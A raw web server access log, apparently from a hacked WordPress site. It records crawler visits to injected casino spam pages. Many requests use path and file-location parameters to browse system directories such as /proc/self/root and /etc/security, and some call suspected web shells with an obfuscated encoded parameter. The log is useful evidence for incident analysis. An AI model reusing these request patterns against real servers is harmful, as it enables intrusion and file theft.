66.249.65.197 - - [01/Nov/2025:08:51:24 -0400] "GET /blackjack-rules-for-dealer-uk/ HTTP/1.1" 200 18367 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
50.16.248.61 - - [01/Nov/2025:08:51:25 -0400] "GET /eurogrand-kasino-probe-alle-erfahrungen-zum-euro-grand-vertrauenswurdig-login-pramie-2024-villa30-senderaum/?fileloc=//var/tmp/4bbb35/blackjack-standard-strategy-ireland.html&path=//var/tmp/4bbb35 HTTP/1.1" 200 4531 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.59 - - [01/Nov/2025:08:51:27 -0400] "GET /q-~190DVVQCSzThJZcLNZDoW3fPWkIAV8YPD15943/ HTTP/1.1" 200 4120 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.213.106.226 - - [01/Nov/2025:08:51:27 -0400] "GET /the-internet-games-are-available-towards-a-professional-internet-casino/?path=//home/creaqbdc/ssl HTTP/1.1" 200 3576 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.223 - - [01/Nov/2025:08:51:31 -0400] "GET /?path=//proc/self/root/proc/2966092/root/etc/security HTTP/1.1" 403 1242 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
69.197.179.242 - - [01/Nov/2025:08:51:29 -0400] "GET /wp-content/x072d63/index.php?id=893896 HTTP/1.1" 200 0 "https://creativefinishings.com/wp-content/x072d63/index.php?id=893896" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.65.197 - - [01/Nov/2025:08:51:32 -0400] "GET /q-~38SMd5jcbweNrkTIPI0rEfWBJZrP6Phm27291/?path=/home/creaqbdc/public_html/wp-includes/PHPMailer HTTP/1.1" 200 19796 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
199.188.200.18 - - [01/Nov/2025:08:46:33 -0400] "GET /tmp/tmp/index.php?ARRAY=7o2230223n313736323030343739332p2231223n22687474703n5p2s5p2s7n7334343676313373752r67697665656r63652r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736323030313139332q6236363339323934633261636533633337633365386262653230656662313730222p2232223n226537363732306562613137633034343263643834636339323834626464303763222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33352q36302q37302q37322q38312q3132227q HTTP/1.1" 200 0 "-" "-"
74.7.227.59 - - [01/Nov/2025:08:51:32 -0400] "GET /q-~199Ew3NjIPng1mMaoN0hcQwypOpkwVYjs7718/ HTTP/1.1" 200 4132 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
35.169.240.53 - - [01/Nov/2025:08:51:33 -0400] "GET /beste-versorger-provision/?fileloc=//proc/self/root/opt/alt/tests/alt-php81-pecl-solr_2.7.0-1.el8/tests/101.solrresponse_parseMode.phpt&path=//proc/self/root/opt/alt/tests/alt-php81-pecl-solr_2.7.0-1.el8/tests HTTP/1.1" 200 3443 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.65.197 - - [01/Nov/2025:08:51:33 -0400] "GET /?q=2148186115800&channel=199e08&from=https://creativefinishings.com/select.cgi?q-~45m1mTWpgUNxPcHIy69bPnIjb1MJebdQ33020/ HTTP/1.1" 200 19754 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
54.84.147.79 - - [01/Nov/2025:08:51:37 -0400] "GET /freispiele-blos-einzahlung2025-beste-freespins-kostenfrei/?path=//opt/alt/python37/lib64/python3.7/site-packages/PyYAML-5.4.1-py3.7.egg-info HTTP/1.1" 200 3604 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.65.197 - - [01/Nov/2025:08:51:38 -0400] "GET /q-~11IbCjTomXFd6L0Unhmd1QGYZ0XoCW7Q34492/?path=/home/creaqbdc/public_html/.well-known HTTP/1.1" 200 19827 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
74.7.227.59 - - [01/Nov/2025:08:51:37 -0400] "GET /q-~289KetnokcJoZp7vVyMz4YulWlGsxnwFA45678/ HTTP/1.1" 200 4132 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.197 - - [01/Nov/2025:08:51:40 -0400] "GET /?q=2148186115800&channel=199e08&from=https://creativefinishings.com/select.cgi?q-~257qOax30IId9nJipGlPbCiH7vnZaRn7I21128/ HTTP/1.1" 200 18762 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.223 - - [01/Nov/2025:08:51:39 -0400] "GET /?path=//proc/self/root/proc/2966092/root/opt/cpanel-ccs HTTP/1.1" 200 2546 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.59 - - [01/Nov/2025:08:51:41 -0400] "GET /q-~35bNJlcXoSfy1na54kaZpYqQoUOKyJOB42170/ HTTP/1.1" 200 4121 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.197 - - [01/Nov/2025:08:51:43 -0400] "GET /q-~168TFdzE1b65JlzkmCPHQ4HG4bhxe3F2I3693/?fileloc=/home/creaqbdc/public_html/robots.txt&path=/home/creaqbdc/public_html HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
44.213.202.136 - - [01/Nov/2025:08:51:42 -0400] "GET /portfolio-commercial?path=//proc/thread-self/root/proc/self/root/lib/.build-id/26 HTTP/1.1" 200 5445 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
3.208.156.9 - - [01/Nov/2025:08:51:45 -0400] "GET /das-beste-world-wide-web-spielbank-via-herumtoben-vortragen/?fileloc=//usr/bin/compare&path=//usr/bin HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.65.197 - - [01/Nov/2025:08:51:45 -0400] "GET /live-casino-deposit-what-you-like/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.59 - - [01/Nov/2025:08:51:46 -0400] "GET /q-~109Icyv2eDVhfkB4qgZocjKMOaFiGmbHW33542/ HTTP/1.1" 200 4145 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.197 - - [01/Nov/2025:08:51:47 -0400] "GET /q-~38SMd5jcbweNrkTIPI0rEfWBJZrP6Phm27291/?path=/home/creaqbdc/public_html/wp-includes/php-compat HTTP/1.1" 200 2793 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
74.7.227.223 - - [01/Nov/2025:08:51:47 -0400] "GET /?path=//proc/self/root/proc/2966092/root/opt/cpanel/ea-openssl/lib/pkgconfig HTTP/1.1" 200 2930 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
50.16.248.61 - - [01/Nov/2025:08:51:49 -0400] "GET /book-of-ra-magic-kostenlos-spielen-ohne-anmeldung/?path=//lib64/python3.6/dbm HTTP/1.1" 200 3608 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.65.197 - - [01/Nov/2025:08:51:50 -0400] "GET /?q=2148186115800&channel=199e08&from=https://creativefinishings.com/select.cgi?q-~14OJwzwoT3nqupaLhl7gUBFHznOlUOJK22441/ HTTP/1.1" 200 18726 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.197 - - [01/Nov/2025:08:51:51 -0400] "GET /q-~166t106bNaOShtG7uZ8Nnm3CvgJ82My5v47957/ HTTP/1.1" 200 20017 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.197 - - [01/Nov/2025:08:51:52 -0400] "GET /items/1423643864.htm HTTP/1.1" 200 19170 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.59 - - [01/Nov/2025:08:51:51 -0400] "GET /q-~169AJfaKPHg6cHiwgIMcfgrkVMN2TElrY34980/ HTTP/1.1" 200 4144 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
199.188.200.18 - - [01/Nov/2025:08:46:53 -0400] "GET /tmp/tmp/index.php?ARRAY=7o2230223n313736323030343831332p2231223n22687474703n5p2s5p2s7n7334343676313373752r67697665656r63652r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736323030313231332q3932373538646663393036313664386435313632633934613965653032623863222p2232223n226537363732306562613137633034343263643834636339323834626464303763222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33352q36302q37302q37322q38312q3132227q HTTP/1.1" 200 0 "-" "-"
23.23.99.55 - - [01/Nov/2025:08:51:53 -0400] "GET /residential/?path=//proc/self/root/proc/self/root/lib/.build-id/fe HTTP/1.1" 200 5143 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.223 - - [01/Nov/2025:08:51:55 -0400] "GET /?path=//proc/self/root/proc/2966092/root/opt/cpanel/ea-openssl/lib/engines HTTP/1.1" 200 3260 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.59 - - [01/Nov/2025:08:51:56 -0400] "GET /q-~44XFkwMGPHDgT7ENIWXvNtNS95PJmtcl36029/ HTTP/1.1" 200 4152 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
107.20.25.33 - - [01/Nov/2025:08:51:57 -0400] "GET /funciona-maquinas-tragamonedas-en-linea-sin-cargo-en-el-caso-de-revision-baywatch-que-nos-lo-olvidemos-joviales-dinero-positivo/?path=//usr/lib/.build-id/2e HTTP/1.1" 200 4563 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.65.197 - - [01/Nov/2025:08:51:57 -0400] "GET /casinos-in-united-kingdom-that-are-18-and-up/ HTTP/1.1" 200 19762 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
34.236.135.14 - - [01/Nov/2025:08:52:00 -0400] "GET /services/door-wrapping/?path=//usr/lib/.build-id/4f HTTP/1.1" 200 4629 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.59 - - [01/Nov/2025:08:52:00 -0400] "GET /q-~207lStYMzPZJJbrINIT3CypCd3O8dhBhH9282/ HTTP/1.1" 200 4117 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.223 - - [01/Nov/2025:08:52:01 -0400] "GET /?path=//proc/self/root/proc/2966092/root/var/softaculous/pie HTTP/1.1" 200 3284 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.198 - - [01/Nov/2025:08:52:04 -0400] "GET /?q=2148186115800&channel=199e08&from=https://creativefinishings.com/select.cgi?q-~287wYzhyCKnnpwTcin7VpO71Y0iwTJYPv30682/ HTTP/1.1" 200 18741 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.59 - - [01/Nov/2025:08:52:04 -0400] "GET /q-~96vqYrswkePqQcm2JFsM2QOXM9EbTHoa14839/ HTTP/1.1" 200 4152 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.209.174.110 - - [01/Nov/2025:08:52:05 -0400] "GET /services/custom-renovations/?path=//proc/self/root/proc/thread-self/root/opt/td-agent-bit HTTP/1.1" 200 3086 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
207.46.13.168 - - [01/Nov/2025:08:52:06 -0400] "GET /items/1942819160.htm HTTP/1.1" 200 18770 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
216.73.216.11 - - [01/Nov/2025:08:52:08 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fquick-setup%2Fcomponents%2FProContent.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fquick-setup%2Fcomponents HTTP/1.1" 200 4522 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:52:08 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FCacheClearer%2FChainCacheClearer.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FCacheClearer HTTP/1.1" 200 2982 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:52:08 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FRequired.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 2776 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:52:08 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FRouting%2FMatcher%2FRequestMatcherInterface.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FRouting%2FMatcher HTTP/1.1" 200 3010 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:52:08 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FMapping%2FElementMetadata.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FMapping HTTP/1.1" 200 3240 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
3.213.46.222 - - [01/Nov/2025:08:52:08 -0400] "GET /das-beste-world-wide-web-spielbank-via-herumtoben-vortragen/?path=//usr/share/locale/tg HTTP/1.1" 200 3340 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.11 - - [01/Nov/2025:08:52:08 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FLocaleValidator.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 3098 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:52:08 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FChoice.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 2993 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.59 - - [01/Nov/2025:08:52:08 -0400] "GET /q-~282QuiWospjpBDtRdIihDi4li6ZewYOxi14051/ HTTP/1.1" 200 4145 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.11 - - [01/Nov/2025:08:52:08 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FEqualTo.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 2823 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:52:09 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpFoundation%2FSession%2FSession.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpFoundation%2FSession HTTP/1.1" 200 3579 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:52:10 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fdashboard%2Fcomponents%2FBloacksHeader.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fdashboard%2Fcomponents HTTP/1.1" 200 2777 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.223 - - [01/Nov/2025:08:52:09 -0400] "GET /?path=//proc/self/root/proc/2966092/root/opt/cpanel/ea-openssl/etc/pki HTTP/1.1" 200 2829 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.11 - - [01/Nov/2025:08:52:10 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FEmail.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 2831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:52:09 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpFoundation%2FFile%2FFile.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpFoundation%2FFile HTTP/1.1" 200 4012 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.65.197 - - [01/Nov/2025:08:52:10 -0400] "GET /?q=2148186115800&channel=199e08&from=https://creativefinishings.com/select.cgi?q-~270fbBS5wlw87nHl7cuNCqvTZmJXLhUVS21655/ HTTP/1.1" 200 20730 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.11 - - [01/Nov/2025:08:52:10 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FRangeValidator.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 3002 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.188.200.18 - - [01/Nov/2025:08:47:14 -0400] "GET /tmp/tmp/index.php?ARRAY=7o2230223n313736323030343833342p2231223n22687474703n5p2s5p2s7n7334343676313373752r67697665656r63652r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736323030313233342q3965326233396135646337656132393134613737386432643066386632306364222p2232223n226537363732306562613137633034343263643834636339323834626464303763222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33352q36302q37302q37322q38312q3132227q HTTP/1.1" 200 0 "-" "-"
216.73.216.11 - - [01/Nov/2025:08:52:10 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fverilog%2Ftest.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fverilog HTTP/1.1" 200 3902 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:52:10 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fquick-setup%2Fcomponents%2FHeader.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fquick-setup%2Fcomponents HTTP/1.1" 200 2971 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:52:11 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FTrueValidator.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 2906 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:52:11 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FLength.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 3139 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:52:11 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FDate.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 2818 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
3.235.215.92 - - [01/Nov/2025:08:52:12 -0400] "GET /main/?path=//opt/cloudlinux/venv/lib/python3.11/site-packages/gitdb HTTP/1.1" 200 4072 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
